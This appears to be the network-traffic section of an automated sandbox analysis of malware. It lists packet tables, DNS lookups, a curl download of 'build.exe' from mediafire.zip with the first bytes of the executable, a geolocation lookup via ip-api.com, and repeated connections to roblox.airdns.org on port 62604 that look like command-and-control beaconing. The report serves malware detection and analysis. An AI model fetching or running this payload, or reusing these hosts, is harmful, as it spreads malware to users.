Jun 9, 2024 01:26:08.426683903 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426707983 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426749945 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.426762104 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426788092 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.426837921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426868916 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426907063 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.426919937 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426945925 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.426971912 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.426980019 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.426994085 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427012920 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427038908 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427057981 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427067995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427104950 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427110910 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427144051 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427145004 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427172899 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427203894 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427264929 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427294016 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427324057 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427365065 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427376986 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427402020 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427417040 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427444935 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427489996 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427503109 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427530050 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427544117 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427568913 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427617073 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427630901 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427659988 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427714109 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427764893 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427781105 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427793980 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427887917 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427892923 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427922964 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.427963018 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.427977085 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428005934 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428024054 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428042889 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428066969 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428116083 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428128004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428158045 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428170919 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428203106 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428205967 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428220034 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428246975 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428294897 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428343058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428369999 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428416014 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428428888 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428451061 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428453922 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428495884 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428541899 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428560972 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428582907 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428618908 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428618908 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428637028 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428661108 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428684950 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428706884 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428716898 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428761959 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428764105 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428795099 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428803921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428818941 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428838968 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428888083 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.428961992 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.428987026 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429059029 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429059982 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429076910 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429111004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429132938 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429146051 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429172039 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429193974 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429208994 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429233074 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429274082 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429286003 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429316044 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429337978 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429358006 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429384947 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429428101 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429440975 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429470062 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429476976 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429491043 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429502964 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429528952 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429544926 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429586887 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429598093 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429649115 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429672956 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429725885 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429745913 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429769039 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429775953 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429811954 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429843903 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429857016 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429883003 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429919004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429948092 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.429960966 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.429975033 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430002928 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430022001 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430056095 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430088997 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430116892 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430156946 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430170059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430195093 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430203915 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430236101 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430270910 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430284977 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430311918 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430345058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430346012 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430361986 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430416107 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430423975 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430438995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430480957 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430501938 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430515051 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430541992 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430608988 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430627108 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430685997 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430696964 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430708885 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430735111 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430754900 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430793047 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430804014 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430852890 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430876017 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430917025 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430932045 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430955887 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.430958033 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.430984020 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.431024075 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.431035995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.431062937 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.431117058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.431180000 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.475677967 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.852745056 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.852826118 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:38.400122881 CEST	49746	80	192.168.2.4	208.95.112.1
Jun 9, 2024 01:26:38.405121088 CEST	80	49746	208.95.112.1	192.168.2.4
Jun 9, 2024 01:26:38.405389071 CEST	49746	80	192.168.2.4	208.95.112.1
Jun 9, 2024 01:26:38.405967951 CEST	49746	80	192.168.2.4	208.95.112.1
Jun 9, 2024 01:26:38.410846949 CEST	80	49746	208.95.112.1	192.168.2.4
Jun 9, 2024 01:26:38.994735003 CEST	80	49746	208.95.112.1	192.168.2.4
Jun 9, 2024 01:26:39.043890953 CEST	49746	80	192.168.2.4	208.95.112.1
Jun 9, 2024 01:26:39.871294022 CEST	49747	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:26:39.876521111 CEST	62604	49747	64.42.179.59	192.168.2.4
Jun 9, 2024 01:26:39.876620054 CEST	49747	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:26:48.348987103 CEST	62604	49747	64.42.179.59	192.168.2.4
Jun 9, 2024 01:26:48.349116087 CEST	49747	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:26:48.355688095 CEST	49747	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:26:48.360630989 CEST	62604	49747	64.42.179.59	192.168.2.4
Jun 9, 2024 01:26:53.905097008 CEST	49748	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:26:53.910367966 CEST	62604	49748	64.42.179.59	192.168.2.4
Jun 9, 2024 01:26:53.910499096 CEST	49748	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:02.388626099 CEST	62604	49748	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:02.388871908 CEST	49748	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:02.389161110 CEST	49748	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:02.394038916 CEST	62604	49748	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:07.701261044 CEST	49750	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:07.706434965 CEST	62604	49750	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:07.706558943 CEST	49750	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:15.529736996 CEST	80	49746	208.95.112.1	192.168.2.4
Jun 9, 2024 01:27:15.529820919 CEST	49746	80	192.168.2.4	208.95.112.1
Jun 9, 2024 01:27:16.178009033 CEST	62604	49750	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:16.178225040 CEST	49750	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:16.178965092 CEST	49750	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:16.183861971 CEST	62604	49750	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:21.761208057 CEST	49751	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:21.766920090 CEST	62604	49751	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:21.767041922 CEST	49751	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:30.244899988 CEST	62604	49751	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:30.244990110 CEST	49751	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:30.245237112 CEST	49751	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:30.250122070 CEST	62604	49751	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:35.513487101 CEST	49752	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:35.518630981 CEST	62604	49752	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:35.518737078 CEST	49752	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:43.998133898 CEST	62604	49752	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:43.998321056 CEST	49752	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:43.998955011 CEST	49752	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:44.005341053 CEST	62604	49752	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:49.466650963 CEST	49753	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:49.471792936 CEST	62604	49753	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:49.472011089 CEST	49753	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:57.948786020 CEST	62604	49753	64.42.179.59	192.168.2.4
Jun 9, 2024 01:27:57.949003935 CEST	49753	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:57.949100971 CEST	49753	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:27:57.954200029 CEST	62604	49753	64.42.179.59	192.168.2.4
Jun 9, 2024 01:28:03.357450008 CEST	49754	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:28:03.362804890 CEST	62604	49754	64.42.179.59	192.168.2.4
Jun 9, 2024 01:28:03.363091946 CEST	49754	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:28:11.835977077 CEST	62604	49754	64.42.179.59	192.168.2.4
Jun 9, 2024 01:28:11.836078882 CEST	49754	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:28:11.836608887 CEST	49754	62604	192.168.2.4	64.42.179.59
Jun 9, 2024 01:28:11.841512918 CEST	62604	49754	64.42.179.59	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2024 01:26:06.736573935 CEST	60827	53	192.168.2.4	1.1.1.1
Jun 9, 2024 01:26:06.769602060 CEST	53	60827	1.1.1.1	192.168.2.4
Jun 9, 2024 01:26:38.384316921 CEST	58211	53	192.168.2.4	1.1.1.1
Jun 9, 2024 01:26:38.392611980 CEST	53	58211	1.1.1.1	192.168.2.4
Jun 9, 2024 01:26:39.764713049 CEST	53950	53	192.168.2.4	1.1.1.1
Jun 9, 2024 01:26:39.863008022 CEST	53	53950	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 9, 2024 01:26:06.736573935 CEST	192.168.2.4	1.1.1.1	0xd31a	Standard query (0)	mediafire.zip	A (IP address)	IN (0x0001)	false
Jun 9, 2024 01:26:38.384316921 CEST	192.168.2.4	1.1.1.1	0x77f4	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jun 9, 2024 01:26:39.764713049 CEST	192.168.2.4	1.1.1.1	0x7735	Standard query (0)	roblox.airdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 9, 2024 01:26:06.769602060 CEST	1.1.1.1	192.168.2.4	0xd31a	No error (0)	mediafire.zip	172.67.195.64	A (IP address)	IN (0x0001)	false
Jun 9, 2024 01:26:06.769602060 CEST	1.1.1.1	192.168.2.4	0xd31a	No error (0)	mediafire.zip	104.21.12.186	A (IP address)	IN (0x0001)	false
Jun 9, 2024 01:26:38.392611980 CEST	1.1.1.1	192.168.2.4	0x77f4	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jun 9, 2024 01:26:39.863008022 CEST	1.1.1.1	192.168.2.4	0x7735	No error (0)	roblox.airdns.org	64.42.179.59	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mediafire.zip

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49746	208.95.112.1	80	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
Jun 9, 2024 01:26:38.405967951 CEST	144	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Jun 9, 2024 01:26:38.994735003 CEST	468	IN	HTTP/1.1 200 OK Date: Sat, 08 Jun 2024 23:26:38 GMT Content-Type: application/json; charset=utf-8 Content-Length: 291 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	172.67.195.64	443	7600	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-08 23:26:07 UTC	86	OUT	GET /build.exe HTTP/1.1 Host: mediafire.zip User-Agent: curl/7.83.1 Accept: /
2024-06-08 23:26:07 UTC	702	IN	HTTP/1.1 200 OK Date: Sat, 08 Jun 2024 23:26:07 GMT Content-Type: application/x-msdownload Content-Length: 3124224 Connection: close Last-Modified: Fri, 07 Jun 2024 19:27:50 GMT ETag: "2fac00-61a51cb8db980" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4439 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVQxDwpfn6Ln2iqodRfhcpg%2Bn3ZgxIbLX3JMaCo95zpLwJaRwIL7NGx5C6Kpx7uxDuMaD87XtIrF5oFtZ0fexh2f%2B2%2Bew8TYf%2FDc0vTly7qon0YzbkfLB9QLXBPNrQu6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 890ca521098e6b1c-DFW alt-svc: h3=":443"; ma=86400
2024-06-08 23:26:07 UTC	667	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e8 6a 82 6c ac 0b ec 3f ac 0b ec 3f ac 0b ec 3f a5 73 7f 3f be 0b ec 3f ca 64 11 3f ad 0b ec 3f fe 7e e8 3e a1 0b ec 3f fe 7e ef 3e b1 0b ec 3f fe 7e ed 3e a8 0b ec 3f 9d 57 11 3f ae 0b ec 3f f9 7e ed 3e ae 0b ec 3f 53 2b e8 3f ae 0b ec 3f fe 7e e9 3e 8a 0b ec 3f f7 63 eb 3e ad 0b ec 3f f7 63 e8 3e a8 0b ec 3f f7 63 ea 3e ad 0b ec 3f f7 63 ed 3e 8b 0b ec 3f ac 0b ed 3f 1d 09 ec Data Ascii: MZ@8!L!This program cannot be run in DOS mode.$jl???s??d??~>?~>?~>?W??~>?S+??~>?c>?c>?c>?c>??
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 00 30 02 00 00 70 21 00 00 2c 02 00 00 e0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 4c 9e 0c 00 00 a0 23 00 00 a0 0c 00 00 0c 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @_RDATA0p!, @@.rsrcL##@@
